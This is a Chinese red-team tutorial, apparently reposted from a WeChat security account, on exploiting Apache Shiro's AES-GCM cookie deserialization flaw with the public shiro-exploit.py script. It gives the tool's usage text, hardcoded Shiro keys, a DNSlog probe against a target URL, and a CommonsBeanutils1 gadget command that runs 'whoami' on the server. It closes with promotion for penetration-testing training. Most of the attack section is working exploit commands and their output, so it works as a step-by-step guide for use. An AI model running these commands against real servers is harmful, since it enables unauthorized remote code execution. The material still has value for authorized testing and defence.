红队攻击第1篇 shiro AES_GCM 反序列化利用

admin 2022年9月25日19:27:03安全文章评论72 views3066字阅读10分13秒阅读模式
红队攻击第1篇 shiro AES_GCM 反序列化利用
红队攻击第1篇 shiro AES_GCM 反序列化利用

1简介

新版本Shiro(>=1.4.2)采用了AES-GCM加密方式,导致旧版工具的加密算法无法正常利用漏洞
如果知道硬编码的情况下可以使用工具
shiro_attack-4.5.3-SNAPSHOT-all 勾上 aes gsm 使用即可
红队攻击第1篇 shiro AES_GCM 反序列化利用

2Ares-X使用

也可以使用脚本  https://github.com/Ares-X/shiro-exploit 进行利用

pip3 install pycryptodome

安装依赖包

python shiro-exploit.py -husage: shiro-exploit.py [-h] [--version VERSION] [--key KEY] [--url URL] [--gadget GADGET] [--command COMMAND]                        [--ser SER]                        mode
Shiro-Exploit : Use python3 shiro-exploit.py usage for More Help Infomation
positional arguments: mode check/yso/echo/encdoe
optional arguments: -h, --help show this help message and exit --version VERSION, -v VERSION Choice Shiro Encrypt Version,1 For AES-CBC 2 For AES-GCM --key KEY, -k KEY Specific shiro key or user default --url URL, -u URL Specific URL Address --gadget GADGET, -g GADGET Specific Gadget [CommonsCollectionsK1/CommonsCollectionsK2/CommonsBeanutils1/CommonsBeanutils2 /Jdk7u21/Jdk8u20] --command COMMAND, -c COMMAND Specific Execute Command --ser SER, -s SER Specific serialize File Path
Usage:    python3 shiro-exploit.py mode arguments    You Can Change Default Key and Ysoserial Path at The Top of File    For Most Usage: [-u url]    Will Send Payload To Target URL                                Left it Empty to Genereate Payload and Exploit Manual                    [-k key]    Will Encrypt Payload With Specific Key                                Left it Empty to Use Shiro Default Key kPH+bIxk5D2deZiIxcaaaA==                    [-v version]Will Encrypt Payload to Specific Shiro Encrypt Version                                if Shiro Version Used AES-CBC Set -v to 1 , if Shiro Used AES-GCM Set -v to 2 , or Left it Empty to Use Default 1                    Those arguments is Not Necessary , Change it If You Need    Sample:    python3 shiro-exploit.py check -u http://127.0.0.1  Auto Detect Shiro Key For Version 1 And Version 2    python3 shiro-exploit.py check -u http://127.0.0.1 -v 1 Auto Detect Shiro Key For Version 1    python3 shiro-exploit.py check -k zSyK5Kp6PZAAjlT+eeNMlg== Genereate Check Specific Key Payload For Version 1 and 2    python3 shiro-exploit.py check -k zSyK5Kp6PZAAjlT+eeNMlg== -v 2 Genereate Check Specific Key Payload For Version 2    python3 shiro-exploit.py yso -g URLDNS -c "http://xxx.dnslog.pro" -u http://127.0.0.1 -k zSyK5Kp6PZAAjlT+eeNMlg== -v 1 Send Ysoserial Payload to Target URL    python3 shiro-exploit.py yso -g URLDNS -c "http://xxx.dnslog.pro" -k zSyK5Kp6PZAAjlT+eeNMlg== -v 1 Genereate Ysoserial Payload    python3 shiro-exploit.py echo -g CommonsCollectionsK1 -c "ifconfig" -u http://127.0.0.1 Send Tomcat Echo Payload To Target URL    python3 shiro-exploit.py echo -g CommonsCollectionsK1 -c "ifconfig" -k zSyK5Kp6PZAAjlT+eeNMlg== Genereate Tomcat Echo Payload    python3 shiro-exploit.py encode -s ./cookie.ser -u http://127.0.0.1 Encode Serialize File And Send to Target URL    python3 shiro-exploit.py encode -s ./cookie.ser -k zSyK5Kp6PZAAjlT+eeNMlg== Encode Serialize File For Exploit Manual


脚本自带一些硬编码,这里是知道硬编码的。所以把编码加进行就可以了。
检测硬编码
2是 gsm加密方式

python shiro-exploit.py check -u http://192.168.0.115:8080 -v 2

知道硬编码的前提下可以使用key进行检测
利用dnslog检测目标是否存在漏洞

shiro-exploit.py yso -g URLDNS -c "http://moonsec.03d3fu.dnslog.cn" -k d3d3bWluZ3NvZnRuZXRtcw== -u http://192.168.0.115:8080/xxx/ms/login.do -v 2Gadget: URLDNS Command: http://moonsec.03d3fu.dnslog.cnSend Over:200


红队攻击第1篇 shiro AES_GCM 反序列化利用

命令执行 shiro一般使用  CommonsBeanutils1 这无依赖链子

shiro-exploit.py echo -g CommonsBeanutils1 -u http://192.168.0.115:8080/xxx/ms/index.do -v 2 -k d3d3bWluZ3NvZnRuZXRtcw== -c whoami


红队攻击第1篇 shiro AES_GCM 反序列化利用

3关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏


6关注培训

需要渗透测试培训可联系暗月

红队攻击第1篇 shiro AES_GCM 反序列化利用

课程详细介绍点击即可了解

暗月渗透测试课程更新


原文始发于微信公众号(moonsec):红队攻击第1篇 shiro AES_GCM 反序列化利用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月25日19:27:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  红队攻击第1篇 shiro AES_GCM 反序列化利用 https://cn-sec.com/archives/1313676.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: